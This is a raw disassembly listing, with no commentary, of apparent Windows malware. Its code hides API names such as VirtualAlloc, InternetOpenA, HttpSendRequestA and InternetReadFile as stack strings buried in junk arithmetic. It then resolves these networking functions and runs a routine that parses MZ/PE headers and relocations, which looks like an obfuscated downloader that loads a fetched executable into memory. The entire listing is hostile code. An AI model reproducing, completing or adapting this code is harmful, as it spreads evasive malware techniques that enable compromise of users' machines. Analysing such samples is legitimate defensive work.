call dword ptr [ebx+437h]
mov [ebx+94h], eax
mov eax, [ebx+94h]
mov [ebx+22Fh], eax
add dh, 0C5h
mov byte ptr [ebx+427h], 72h
mov cl, 0FAh
or ch, 0A7h
mov byte ptr [ebx+42Bh], 73h
sub dh, 5Bh
or ch, 7Eh
mov byte ptr [ebx+426h], 50h
xor cl, 0D7h
xor dh, 4Bh
mov byte ptr [ebx+42Ah], 65h
add ch, 0C8h
or cl, 99h
mov byte ptr [ebx+422h], 45h
mov byte ptr [ebx+425h], 74h
sub dl, 48h
xor cl, 0B9h
mov byte ptr [ebx+42Dh], 0
add ch, 0CCh
mov cl, 1Ah
mov byte ptr [ebx+429h], 63h
mov byte ptr [ebx+428h], 6Fh
or dl, 30h
and cl, 0CAh
mov byte ptr [ebx+42Ch], 73h
or ch, 61h
and cl, 73h
mov byte ptr [ebx+423h], 78h
xor cl, 25h
mov dl, 0D3h
mov byte ptr [ebx+424h], 69h
and cl, 57h
sub esp, 8
add dl, 54h
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
or ch, 0BCh
lea edi, [ebx+422h]
mov [esp+44h+var_40], edi
add dh, 0C6h
call dword ptr [ebx+1C4h]
mov [ebx+58h], eax
mov eax, [ebx+58h]
mov [ebx+5FFh], eax
add dh, 6Ch
mov byte ptr [ebx+2Dh], 47h
mov byte ptr [ebx+30h], 50h
mov ch, 0BCh
mov byte ptr [ebx+3Bh], 0
add cl, 28h
mov ch, 23h
mov byte ptr [ebx+2Eh], 65h
mov byte ptr [ebx+2Fh], 74h
mov cl, 12h
add dh, 15h
mov byte ptr [ebx+31h], 72h
xor dh, 56h
add cl, 19h
mov byte ptr [ebx+36h], 73h
mov byte ptr [ebx+34h], 65h
or dl, 82h
mov byte ptr [ebx+35h], 73h
and ch, 0FDh
mov byte ptr [ebx+39h], 61h
add dh, 42h
mov byte ptr [ebx+33h], 63h
mov byte ptr [ebx+37h], 48h
and cl, 0E1h
mov byte ptr [ebx+38h], 65h
and cl, 0E7h
sub cl, 44h
mov byte ptr [ebx+32h], 6Fh
sub ch, 0CFh
sub cl, 0EDh
mov byte ptr [ebx+3Ah], 70h
mov cl, 1Bh
sub esp, 8
add cl, 0E0h
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
xor cl, 5Bh
or cl, 0BBh
lea edi, [ebx+2Dh]
mov [esp+44h+var_40], edi
call dword ptr [ebx+1C4h]
mov [ebx+54h], eax
mov eax, [ebx+54h]
mov [ebx+37Ah], eax
add dl, 0ABh
mov byte ptr [ebx+1A2h], 6Ch
mov byte ptr [ebx+1A3h], 6Ch
or ch, 77h
add ch, 66h
mov byte ptr [ebx+19Fh], 61h
or cl, 3Fh
add dl, 2Ah
mov byte ptr [ebx+1A5h], 63h
mov ch, 4Dh
add dl, 0D1h
mov byte ptr [ebx+1A0h], 70h
mov dl, 1Bh
add dl, 26h
mov byte ptr [ebx+19Dh], 48h
xor dh, 0DAh
or cl, 0Fh
mov byte ptr [ebx+1A1h], 41h
or dh, 0B7h
mov byte ptr [ebx+1A6h], 0
mov byte ptr [ebx+1A4h], 6Fh
add cl, 12h
sub dl, 0A2h
mov byte ptr [ebx+19Eh], 65h
sub esp, 8
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
xor dh, 0A3h
or dl, 0CFh
lea edi, [ebx+19Dh]
mov [esp+44h+var_40], edi
call dword ptr [ebx+1C4h]
mov [ebx+692h], eax
mov eax, [ebx+692h]
mov [ebx+617h], eax
xor dh, 7Fh
mov byte ptr [ebx+42Eh], 48h
and dh, 0F1h
sub ch, 62h
mov byte ptr [ebx+434h], 65h
add ch, 8Eh
or dh, 27h
mov byte ptr [ebx+436h], 0
mov byte ptr [ebx+42Fh], 65h
mov cl, 0A6h
and dh, 0E1h
mov byte ptr [ebx+433h], 72h
add ch, 26h
and dl, 0E7h
mov byte ptr [ebx+431h], 70h
mov byte ptr [ebx+432h], 46h
add ch, 0F2h
mov byte ptr [ebx+430h], 61h
mov byte ptr [ebx+435h], 65h
add dl, 4Ah
mov dl, 0D1h
sub esp, 8
and cl, 95h
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
sub al, 0A6h
lea edi, [ebx+42Eh]
mov [esp+44h+var_40], edi
or ch, 2Dh
or dh, 8Dh
call dword ptr [ebx+1C4h]
mov [ebx+696h], eax
mov eax, [ebx+696h]
mov [ebx+1DEh], eax
xor dh, 20h
mov byte ptr [ebx+367h], 6Ch
mov byte ptr [ebx+36Ch], 63h
and cl, 0DEh
mov byte ptr [ebx+366h], 61h
mov ch, 0B4h
mov byte ptr [ebx+363h], 72h
xor dl, 0C1h
add dl, 98h
mov byte ptr [ebx+36Bh], 6Fh
xor cl, 18h
add cl, 0CFh
mov byte ptr [ebx+362h], 69h
and dh, 24h
mov byte ptr [ebx+36Ah], 6Ch
add ch, 0CCh
mov byte ptr [ebx+36Dh], 0
add dh, 0C1h
xor dh, 8Fh
mov byte ptr [ebx+365h], 75h
or dl, 0EDh
mov byte ptr [ebx+369h], 6Ch
sub dh, 0A2h
or cl, 14h
mov byte ptr [ebx+361h], 56h
and cl, 0C5h
sub cl, 0E8h
mov byte ptr [ebx+364h], 74h
mov byte ptr [ebx+368h], 41h
add cl, 51h
sub esp, 8
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
or dl, 39h
lea edi, [ebx+361h]
mov [esp+44h+var_40], edi
add cl, 0D3h
sub dl, 50h
call dword ptr [ebx+1C4h]
mov [ebx+30Ah], eax
mov eax, [ebx+30Ah]
mov [ebx+1F6h], eax
mov byte ptr [ebx+5F1h], 53h
and cl, 0C5h
mov byte ptr [ebx+5F5h], 70h
mov byte ptr [ebx+5F6h], 0
sub cl, 99h
mov byte ptr [ebx+5F2h], 6Ch
add dh, 2Eh
mov byte ptr [ebx+5F3h], 65h
sub ch, 0C3h
mov byte ptr [ebx+5F4h], 65h
sub esp, 8
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
xor ch, 53h
lea edi, [ebx+5F1h]
mov [esp+44h+var_40], edi
call dword ptr [ebx+1C4h]
mov [ebx+60Fh], eax
mov eax, [ebx+60Fh]
mov [ebx+6BFh], eax
and dh, 24h
and dl, 8Bh
mov byte ptr [ebx+662h], 43h
mov byte ptr [ebx+664h], 65h
mov dl, 0Eh
mov byte ptr [ebx+66Dh], 0
add dh, 0ECh
mov ch, 0C2h
mov byte ptr [ebx+66Bh], 65h
mov dl, 8Dh
mov byte ptr [ebx+665h], 61h
mov dl, 14h
mov byte ptr [ebx+666h], 74h
mov byte ptr [ebx+66Ch], 41h
mov byte ptr [ebx+669h], 69h
and cl, 0AEh
and ch, 87h
mov byte ptr [ebx+667h], 65h
mov byte ptr [ebx+668h], 46h
mov dl, 0B5h
mov byte ptr [ebx+66Ah], 6Ch
or cl, 0F8h
mov byte ptr [ebx+663h], 72h
or dl, 0BDh
xor cl, 76h
sub esp, 8
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
or ch, 0E4h
or ch, 9Eh
lea edi, [ebx+662h]
mov [esp+44h+var_40], edi
and ch, 6Ah
xor dl, 3Dh
call dword ptr [ebx+1C4h]
mov [ebx+74Fh], eax
mov eax, [ebx+74Fh]
mov [ebx+264h], eax
mov dh, 92h
and dh, 0DBh
mov byte ptr [ebx+1DCh], 65h
xor ch, 0D1h
mov byte ptr [ebx+1D8h], 64h
xor dl, 81h
mov byte ptr [ebx+1D9h], 46h
add dh, 32h
mov byte ptr [ebx+1D5h], 52h
mov cl, 3Ah
mov byte ptr [ebx+1DDh], 0
mov dh, 1Ch
xor dh, 6Ah
mov byte ptr [ebx+1D6h], 65h
mov byte ptr [ebx+1D7h], 61h
mov byte ptr [ebx+1DBh], 6Ch
xor dl, 0BEh
mov byte ptr [ebx+1DAh], 69h
or dl, 8Bh
sub esp, 8
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
or dl, 28h
sub dl, 6Ch
add cl, 0B3h
lea edi, [ebx+1D5h]
mov [esp+44h+var_40], edi
xor cl, 0FCh
call dword ptr [ebx+1C4h]
mov [ebx+78Ch], eax
mov eax, [ebx+78Ch]
mov [ebx+5B5h], eax
add ch, 0FCh
or dh, 1Bh
mov byte ptr [ebx+233h], 43h
or cl, 8Eh
mov byte ptr [ebx+23Eh], 0
xor dl, 31h
and ch, 0Eh
mov byte ptr [ebx+23Bh], 64h
or cl, 85h
mov byte ptr [ebx+237h], 65h
xor dl, 0C3h
mov byte ptr [ebx+236h], 73h
sub dh, 78h
mov ch, 57h
mov byte ptr [ebx+23Ah], 6Eh
or cl, 5Eh
add dl, 12h
mov byte ptr [ebx+239h], 61h
and dl, 0BAh
add dh, 50h
mov byte ptr [ebx+238h], 48h
mov byte ptr [ebx+23Ch], 6Ch
sub dl, 64h
mov ch, 0BAh
mov byte ptr [ebx+23Dh], 65h
or ch, 0E2h
mov ch, 91h
mov byte ptr [ebx+235h], 6Fh
mov byte ptr [ebx+234h], 6Ch
add dh, 0C3h
sub esp, 8
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
and dl, 0F5h
and cl, 76h
lea edi, [ebx+233h]
mov [esp+44h+var_40], edi
sub ch, 25h
call dword ptr [ebx+1C4h]
mov [ebx+0F8h], eax
mov eax, [ebx+0F8h]
mov [ebx+798h], eax
add dl, 0F1h
add dh, 0BEh
mov byte ptr [ebx+5ABh], 6Dh
and dl, 80h
add cl, 0CAh
mov byte ptr [ebx+5AEh], 64h
sub dl, 6Dh
and cl, 93h
mov byte ptr [ebx+5A5h], 47h
mov byte ptr [ebx+5A7h], 74h
mov byte ptr [ebx+5ACh], 61h
add ch, 4Fh
sub ch, 0C6h
mov byte ptr [ebx+5B1h], 6Eh
mov byte ptr [ebx+5B4h], 0
or cl, 0BCh
mov byte ptr [ebx+5B0h], 69h
mov dh, 8Dh
mov dl, 0A3h
mov byte ptr [ebx+5ADh], 6Eh
xor ch, 0D7h
and dh, 3Ah
mov byte ptr [ebx+5AAh], 6Dh
sub cl, 8
mov byte ptr [ebx+5A9h], 6Fh
and cl, 96h
mov dh, 43h
mov byte ptr [ebx+5B3h], 41h
mov byte ptr [ebx+5A8h], 43h
mov byte ptr [ebx+5B2h], 65h
add dl, 7Ah
sub dl, 71h
mov byte ptr [ebx+5AFh], 4Ch
mov byte ptr [ebx+5A6h], 65h
xor dl, 0CCh
sub esp, 8
and ah, 7Dh
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
and ch, 1Dh
and dh, 8Bh
xor ah, 21h
lea edi, [ebx+5A5h]
mov [esp+44h+var_40], edi
call dword ptr [ebx+1C4h]
mov [ebx+0AAh], eax
mov eax, [ebx+0AAh]
mov [ebx+607h], eax
and dh, 0D6h
mov byte ptr [ebx+596h], 7Ah
xor dl, 91h
xor cl, 89h
mov byte ptr [ebx+58Eh], 65h
sub cl, 47h
and dl, 0FCh
mov byte ptr [ebx+593h], 65h
sub cl, 60h
add dh, 22h
mov byte ptr [ebx+591h], 69h
or dl, 0C6h
mov byte ptr [ebx+590h], 46h
mov byte ptr [ebx+595h], 69h
add dl, 50h
add dh, 0DAh
mov byte ptr [ebx+58Fh], 74h
mov byte ptr [ebx+58Dh], 47h
or cl, 0B0h
or dh, 7Eh
mov byte ptr [ebx+597h], 65h
and cl, 37h
sub dh, 0A4h
mov byte ptr [ebx+594h], 53h
mov byte ptr [ebx+598h], 0
and dh, 0B0h
mov byte ptr [ebx+592h], 6Ch
sub esp, 8
mov eax, [ebx+22Fh]
mov [esp+44h+var_44], eax
xor al, 9Bh
lea edi, [ebx+58Dh]
mov [esp+44h+var_40], edi
mov cl, 0D9h
call dword ptr [ebx+1C4h]
mov [ebx+40h], eax
mov eax, [ebx+40h]
mov [ebx+326h], eax
mov ch, 0A7h
xor ch, 34h
mov byte ptr [ebx+5C4h], 2Eh
and ch, 7Dh
sub dl, 0EAh
mov byte ptr [ebx+5C0h], 69h
mov dh, 6Ah
and ch, 0D0h
mov byte ptr [ebx+5BEh], 69h
mov byte ptr [ebx+5C6h], 6Ch
sub dh, 0FEh
and dl, 0E4h
mov byte ptr [ebx+5C1h], 6Eh
mov byte ptr [ebx+5BDh], 77h
mov byte ptr [ebx+5C5h], 64h
mov byte ptr [ebx+5C2h], 65h
mov byte ptr [ebx+5C8h], 0
mov byte ptr [ebx+5BFh], 6Eh
mov byte ptr [ebx+5C7h], 6Ch
mov byte ptr [ebx+5C3h], 74h
sub esp, 4
lea edi, [ebx+5BDh]
mov [esp+40h+var_40], edi
or dl, 0A5h
mov ch, 0D6h
call dword ptr [ebx+437h]
mov [ebx+179h], eax
mov eax, [ebx+179h]
mov [ebx+1B7h], eax
mov dh, 0FDh
sub cl, 26h
cmp dword ptr [ebx+1B7h], 0
jnz short loc_402671
jmp locret_402E7E
; ---------------------------------------------------------------------------
loc_402671: ; CODE XREF: sub_401DC8+8A2�j
mov byte ptr [ebx+453h], 49h
add dh, 4Fh
mov byte ptr [ebx+45Ah], 74h
sub ch, 2Eh
and dh, 8Dh
mov byte ptr [ebx+45Ch], 72h
mov byte ptr [ebx+45Bh], 43h
xor ch, 42h
mov byte ptr [ebx+457h], 72h
mov byte ptr [ebx+458h], 6Eh
sub dh, 55h
xor ch, 0CBh
mov byte ptr [ebx+463h], 41h
add dh, 0EBh
and cl, 3
mov byte ptr [ebx+461h], 72h
add dh, 45h
mov byte ptr [ebx+462h], 6Ch
and dh, 0B8h
and dh, 0CAh
mov byte ptr [ebx+456h], 65h
mov byte ptr [ebx+455h], 74h
xor dh, 8Bh
mov byte ptr [ebx+464h], 0
mov byte ptr [ebx+45Fh], 6Bh
mov byte ptr [ebx+460h], 55h
sub dl, 0DEh
or dl, 0F8h
mov byte ptr [ebx+45Dh], 61h
and cl, 9Ch
mov byte ptr [ebx+45Eh], 63h
sub ch, 0D9h
sub cl, 2
mov byte ptr [ebx+454h], 6Eh
mov byte ptr [ebx+459h], 65h
or dl, 2Ch
sub esp, 8
or ch, 0A9h
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
sub dh, 0AFh
xor ah, 0E9h
lea edi, [ebx+453h]
mov [esp+44h+var_40], edi
sub dh, 0E5h
add dh, 4Ah
call dword ptr [ebx+1C4h]
mov [ebx+312h], eax
mov eax, [ebx+312h]
mov [ebx+1FEh], eax
sub cl, 7Ah
mov dh, 73h
mov byte ptr [ebx+0A2h], 65h
sub dh, 50h
mov byte ptr [ebx+98h], 49h
mov ch, 6
mov byte ptr [ebx+9Dh], 6Eh
mov byte ptr [ebx+9Ch], 72h
xor ch, 0FAh
add cl, 29h
mov byte ptr [ebx+99h], 6Eh
mov byte ptr [ebx+0A3h], 6Eh
or ch, 87h
mov byte ptr [ebx+9Fh], 74h
mov byte ptr [ebx+9Eh], 65h
mov byte ptr [ebx+9Ah], 74h
xor dh, 7Eh
xor dh, 7
mov byte ptr [ebx+0A4h], 41h
mov byte ptr [ebx+0A0h], 4Fh
mov byte ptr [ebx+0A5h], 0
mov byte ptr [ebx+0A1h], 70h
and cl, 7Ch
mov byte ptr [ebx+9Bh], 65h
add cl, 48h
sub esp, 8
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
and dh, 51h
sub dh, 30h
lea edi, [ebx+98h]
mov [esp+44h+var_40], edi
sub dh, 77h
call dword ptr [ebx+1C4h]
mov [ebx+191h], eax
mov eax, [ebx+191h]
mov [ebx+75Fh], eax
mov byte ptr [ebx+247h], 72h
mov dl, 73h
add cl, 9Ah
mov byte ptr [ebx+24Ah], 74h
xor ch, 99h
sub ch, 50h
mov byte ptr [ebx+251h], 74h
mov ch, 68h
mov byte ptr [ebx+249h], 65h
or dl, 11h
mov byte ptr [ebx+246h], 65h
mov dh, 0EEh
mov dh, 0F5h
mov byte ptr [ebx+250h], 63h
mov byte ptr [ebx+245h], 74h
mov byte ptr [ebx+24Bh], 43h
mov cl, 0E4h
mov ch, 39h
mov byte ptr [ebx+24Eh], 6Eh
xor ch, 7Ch
mov byte ptr [ebx+248h], 6Eh
or cl, 74h
add cl, 7Fh
mov byte ptr [ebx+243h], 49h
or ch, 0C1h
sub ch, 0DCh
mov byte ptr [ebx+244h], 6Eh
mov byte ptr [ebx+253h], 0
or ch, 18h
add cl, 0C3h
mov byte ptr [ebx+24Fh], 65h
and dl, 0Ah
or dh, 10h
mov byte ptr [ebx+252h], 41h
mov byte ptr [ebx+24Dh], 6Eh
and dl, 0E6h
xor dl, 63h
mov byte ptr [ebx+24Ch], 6Fh
add dl, 5Eh
sub esp, 8
add cl, 93h
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
xor ch, 12h
xor al, 4Ah
lea edi, [ebx+243h]
mov [esp+44h+var_40], edi
call dword ptr [ebx+1C4h]
mov [ebx+5B9h], eax
mov eax, [ebx+5B9h]
mov [ebx+0D3h], eax
xor dl, 89h
mov cl, 0EBh
mov byte ptr [ebx+14h], 4Fh
mov dh, 6Bh
xor dl, 0CEh
mov byte ptr [ebx+1Bh], 75h
sub cl, 0B7h
or dh, 3
mov byte ptr [ebx+10h], 48h
sub dh, 87h
xor dl, 11h
mov byte ptr [ebx+18h], 52h
sub dh, 0A1h
mov byte ptr [ebx+1Eh], 74h
or ch, 0BBh
add ch, 0B8h
mov byte ptr [ebx+19h], 65h
and dl, 37h
mov byte ptr [ebx+1Ch], 65h
mov byte ptr [ebx+16h], 65h
mov byte ptr [ebx+1Fh], 41h
mov ch, 44h
or dl, 0B0h
mov byte ptr [ebx+1Dh], 73h
sub dh, 0EEh
and cl, 9Dh
mov byte ptr [ebx+13h], 70h
or dl, 97h
mov byte ptr [ebx+15h], 70h
mov byte ptr [ebx+11h], 74h
sub cl, 0CDh
or ch, 8Dh
mov byte ptr [ebx+17h], 6Eh
sub cl, 0A1h
mov byte ptr [ebx+1Ah], 71h
mov byte ptr [ebx+12h], 74h
mov dh, 8Eh
add cl, 0A0h
mov byte ptr [ebx+20h], 0
or cl, 58h
sub esp, 8
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
lea edi, [ebx+10h]
mov [esp+44h+var_40], edi
call dword ptr [ebx+1C4h]
mov [ebx+63Eh], eax
mov eax, [ebx+63Eh]
mov [ebx+382h], eax
mov dh, 0ABh
xor cl, 41h
mov byte ptr [ebx+0BFh], 73h
or dl, 90h
mov byte ptr [ebx+0B3h], 74h
add dl, 90h
sub dl, 36h
mov byte ptr [ebx+0BBh], 65h
mov cl, 23h
or dh, 0D6h
mov byte ptr [ebx+0B8h], 6Eh
mov dl, 57h
mov byte ptr [ebx+0BEh], 65h
xor dh, 2Bh
mov ch, 1Eh
mov byte ptr [ebx+0B4h], 74h
mov byte ptr [ebx+0BCh], 71h
mov byte ptr [ebx+0BAh], 52h
mov byte ptr [ebx+0C0h], 74h
mov dh, 15h
mov byte ptr [ebx+0B2h], 48h
xor dl, 9Fh
mov cl, 0EAh
mov byte ptr [ebx+0B5h], 70h
xor ch, 9Bh
mov dl, 0D6h
mov byte ptr [ebx+0B6h], 53h
or ch, 0CBh
mov byte ptr [ebx+0C2h], 0
sub cl, 0CDh
mov byte ptr [ebx+0C1h], 41h
mov byte ptr [ebx+0B7h], 65h
mov dl, 8Ch
mov byte ptr [ebx+0B9h], 64h
or dh, 12h
mov byte ptr [ebx+0BDh], 75h
or dh, 0C9h
sub esp, 8
sub ah, 0E7h
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
or dh, 9Dh
lea edi, [ebx+0B2h]
mov [esp+44h+var_40], edi
call dword ptr [ebx+1C4h]
mov [ebx+17Dh], eax
mov eax, [ebx+17Dh]
mov [ebx+155h], eax
mov byte ptr [ebx+638h], 41h
add ch, 0AFh
add dh, 1Fh
mov byte ptr [ebx+636h], 66h
xor cl, 67h
add dl, 0FEh
mov byte ptr [ebx+635h], 6Eh
mov dh, 53h
mov byte ptr [ebx+62Fh], 51h
mov byte ptr [ebx+62Ch], 74h
add dh, 52h
or dl, 0D2h
mov byte ptr [ebx+62Eh], 70h
xor dl, 0FEh
mov dl, 9Ah
mov byte ptr [ebx+632h], 72h
mov byte ptr [ebx+631h], 65h
mov dh, 5Dh
mov byte ptr [ebx+634h], 49h
sub cl, 6Ch
mov byte ptr [ebx+630h], 75h
xor ch, 0BEh
mov byte ptr [ebx+639h], 0
mov byte ptr [ebx+633h], 79h
or dl, 96h
xor ch, 1Bh
mov byte ptr [ebx+62Dh], 74h
mov byte ptr [ebx+637h], 6Fh
mov byte ptr [ebx+62Bh], 48h
sub esp, 8
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
xor ch, 89h
and dh, 0C7h
and ah, 4Dh
lea edi, [ebx+62Bh]
mov [esp+44h+var_40], edi
mov dl, 98h
call dword ptr [ebx+1C4h]
mov [ebx+5E1h], eax
mov eax, [ebx+5E1h]
mov [ebx+447h], eax
mov byte ptr [ebx+355h], 74h
mov byte ptr [ebx+34Ah], 72h
or cl, 7Dh
mov byte ptr [ebx+353h], 44h
sub cl, 17h
sub dh, 36h
mov byte ptr [ebx+35Bh], 6Ch
mov byte ptr [ebx+35Dh], 62h
mov byte ptr [ebx+346h], 49h
and ch, 0A6h
sub dh, 3Dh
mov byte ptr [ebx+348h], 74h
xor dh, 0CFh
mov cl, 19h
mov byte ptr [ebx+34Eh], 51h
mov dl, 6
mov byte ptr [ebx+35Ah], 69h
xor dl, 0D2h
mov byte ptr [ebx+35Ch], 61h
xor cl, 0EFh
mov ch, 7Dh
mov byte ptr [ebx+354h], 61h
sub dl, 8Ah
or cl, 91h
mov byte ptr [ebx+350h], 65h
xor dl, 41h
mov byte ptr [ebx+357h], 41h
mov ch, 32h
mov byte ptr [ebx+349h], 65h
add dl, 52h
or dl, 58h
mov byte ptr [ebx+34Dh], 74h
or ch, 61h
add cl, 30h
mov byte ptr [ebx+34Bh], 6Eh
add cl, 0D3h
mov dh, 74h
mov byte ptr [ebx+34Fh], 75h
mov byte ptr [ebx+360h], 0
sub dh, 0CAh
mov byte ptr [ebx+347h], 6Eh
mov byte ptr [ebx+34Ch], 65h
mov byte ptr [ebx+351h], 72h
and dl, 0D9h
mov byte ptr [ebx+35Fh], 65h
or dh, 96h
mov dh, 6Eh
mov byte ptr [ebx+352h], 79h
mov byte ptr [ebx+356h], 61h
mov ch, 9Ch
mov byte ptr [ebx+358h], 76h
or dl, 0Ah
and cl, 2Fh
mov byte ptr [ebx+359h], 61h
and cl, 8Bh
mov byte ptr [ebx+35Eh], 6Ch
sub esp, 8
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
or ch, 74h
xor cl, 0FEh
lea edi, [ebx+346h]
mov [esp+44h+var_40], edi
and dl, 0FFh
add dh, 0A5h
call dword ptr [ebx+1C4h]
mov [ebx+1A7h], eax
mov eax, [ebx+1A7h]
mov [ebx+8Ch], eax
mov byte ptr [ebx+6BBh], 69h
xor dh, 42h
and cl, 8
mov byte ptr [ebx+6B2h], 72h
add dl, 0A0h
mov byte ptr [ebx+6BCh], 6Ch
mov byte ptr [ebx+6BDh], 65h
mov byte ptr [ebx+6AFh], 6Eh
xor cl, 70h
mov byte ptr [ebx+6B8h], 61h
mov dl, 0FCh
mov byte ptr [ebx+6B1h], 65h
sub dl, 0Bh
add cl, 25h
mov byte ptr [ebx+6AEh], 49h
sub dh, 18h
mov byte ptr [ebx+6B0h], 74h
mov byte ptr [ebx+6BAh], 46h
xor dh, 0E0h
and dh, 0E8h
mov byte ptr [ebx+6B3h], 6Eh
add dl, 75h
mov byte ptr [ebx+6B7h], 65h
add ch, 3Bh
mov byte ptr [ebx+6B6h], 52h
and dh, 10h
mov byte ptr [ebx+6B5h], 74h
or dl, 0F6h
mov byte ptr [ebx+6B4h], 65h
or dl, 0C1h
sub cl, 64h
mov byte ptr [ebx+6B9h], 64h
and cl, 38h
or dh, 0FEh
mov byte ptr [ebx+6BEh], 0
xor dh, 9Fh
sub esp, 8
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
sub cl, 0CDh
lea edi, [ebx+6AEh]
mov [esp+44h+var_40], edi
or dh, 42h
call dword ptr [ebx+1C4h]
mov [ebx+5E9h], eax
mov eax, [ebx+5E9h]
mov [ebx+31Eh], eax
mov byte ptr [ebx+0EAh], 6Fh
mov byte ptr [ebx+0E6h], 65h
mov byte ptr [ebx+0E1h], 6Eh
or dh, 0E8h
mov byte ptr [ebx+0E0h], 49h
mov byte ptr [ebx+0EFh], 6Eh
add ch, 0B6h
mov byte ptr [ebx+0F3h], 0
mov dh, 57h
xor dh, 0BEh
mov byte ptr [ebx+0ECh], 65h
or dh, 0DDh
mov byte ptr [ebx+0E5h], 6Eh
xor ch, 0A1h
add ch, 49h
mov byte ptr [ebx+0EDh], 48h
mov byte ptr [ebx+0EBh], 73h
xor dh, 0EAh
or dl, 9
mov byte ptr [ebx+0E2h], 74h
mov byte ptr [ebx+0E4h], 72h
and dh, 67h
and dl, 65h
mov byte ptr [ebx+0E8h], 43h
mov byte ptr [ebx+0F0h], 64h
add cl, 8Ah
mov cl, 0BEh
mov byte ptr [ebx+0EEh], 61h
mov byte ptr [ebx+0E7h], 74h
add ch, 23h
mov byte ptr [ebx+0F2h], 65h
mov byte ptr [ebx+0F1h], 6Ch
mov byte ptr [ebx+0E3h], 65h
mov dl, 0E6h
mov byte ptr [ebx+0E9h], 6Ch
sub esp, 8
xor ch, 0A4h
mov eax, [ebx+1B7h]
mov [esp+44h+var_44], eax
and ch, 53h
add dl, 0A8h
lea edi, [ebx+0E0h]
mov [esp+44h+var_40], edi
xor ch, 6Fh
sub dh, 21h
call dword ptr [ebx+1C4h]
mov [ebx+41Eh], eax
mov eax, [ebx+41Eh]
mov [ebx+767h], eax
add cl, 94h
and cl, 37h
locret_402E7E: ; CODE XREF: sub_401DC8+8A4�j
leave
retn
sub_401DC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E80 proc near ; CODE XREF: sub_401470+462�p
; sub_401A70+3C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
mov ebx, dword_403200
mov dword ptr [ebx+316h], 0
mov dl, 0F7h
sub dh, 17h
loc_402E9B: ; CODE XREF: sub_402E80+60�j
sub ah, 38h
mov eax, [ebp+arg_8]
cmp [ebx+316h], eax
jl short loc_402EB1
sub dl, 0E6h
add cl, 32h
jmp short locret_402EE2
; ---------------------------------------------------------------------------
loc_402EB1: ; CODE XREF: sub_402E80+27�j
mov esi, [ebp+arg_0]
add esi, [ebx+316h]
mov edi, [ebp+arg_4]
add edi, [ebx+316h]
mov al, [edi]
mov [esi], al
xor dl, 0A7h
mov eax, [ebx+316h]
mov [ebx+5FBh], eax
add dword ptr [ebx+316h], 1
and dh, 0E5h
jmp short loc_402E9B
; ---------------------------------------------------------------------------
locret_402EE2: ; CODE XREF: sub_402E80+2F�j
leave
retn 0Ch
sub_402E80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EE6 proc near ; CODE XREF: sub_403CF9+181�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov ebx, dword_403200
mov eax, [ebp+arg_0]
mov [ebx+0D7h], eax
add ch, 23h
and dl, 55h
mov esi, [ebx+0D7h]
add esi, 0
cmp word ptr [esi], 5A4Dh
jnz short loc_402F13
jmp short loc_402F1D
; ---------------------------------------------------------------------------
loc_402F13: ; CODE XREF: sub_402EE6+29�j
mov eax, 0
jmp locret_40318D
; ---------------------------------------------------------------------------
loc_402F1D: ; CODE XREF: sub_402EE6+2B�j
mov eax, [ebx+0D7h]
mov [ebx], eax
mov edi, [ebx+0D7h]
add edi, 3Ch
and ch, 1Fh
mov eax, [edi]
add [ebx], eax
mov eax, [ebx]
mov [ebx+575h], eax
mov esi, [ebx+575h]
add esi, 0
cmp dword ptr [esi], 4550h
jnz short loc_402F50
jmp short loc_402F5A
; ---------------------------------------------------------------------------
loc_402F50: ; CODE XREF: sub_402EE6+66�j
mov eax, 0
jmp locret_40318D
; ---------------------------------------------------------------------------
loc_402F5A: ; CODE XREF: sub_402EE6+68�j
mov edi, [ebx+575h]
add edi, 18h
add edi, 60h
add edi, 8
mov [ebx+23Fh], edi
mov esi, [ebx+23Fh]
add esi, 0
cmp dword ptr [esi], 0
jz short loc_402F7F
jmp short loc_402F89
; ---------------------------------------------------------------------------
loc_402F7F: ; CODE XREF: sub_402EE6+95�j
mov eax, 0
jmp locret_40318D
; ---------------------------------------------------------------------------
loc_402F89: ; CODE XREF: sub_402EE6+97�j
mov eax, [ebp+arg_0]
mov [ebx+336h], eax
and ch, 0D3h
xor dh, 0B2h
mov edi, [ebx+23Fh]
add edi, 0
and dl, 0E4h
mov eax, [edi]
add [ebx+336h], eax
mov eax, [ebx+336h]
mov [ebx+165h], eax
mov esi, [ebx+165h]
add esi, 4
mov eax, [ebp+arg_0]
mov [esi], eax
add cl, 94h
mov edi, [ebp+arg_4]
add edi, 10h
mov eax, [edi]
mov [ebx+784h], eax
mov dl, 0F8h
mov eax, [ebp+arg_0]
add [ebx+784h], eax
mov esi, [ebx+165h]
add esi, 8
mov al, 10h
mov eax, [ebx+784h]
mov [esi], eax
sub cl, 0F5h
add cl, 8Ch
loc_402FFB: ; CODE XREF: sub_402EE6+29B�j
mov al, 0FAh
mov esi, [ebx+165h]
add esi, 10h
cmp dword ptr [esi], 0
jnz short loc_403016
or dl, 4Fh
and cl, 0BAh
jmp loc_403186
; ---------------------------------------------------------------------------
loc_403016: ; CODE XREF: sub_402EE6+123�j
mov eax, [ebp+arg_0]
mov [ebx+672h], eax
and cl, 0E0h
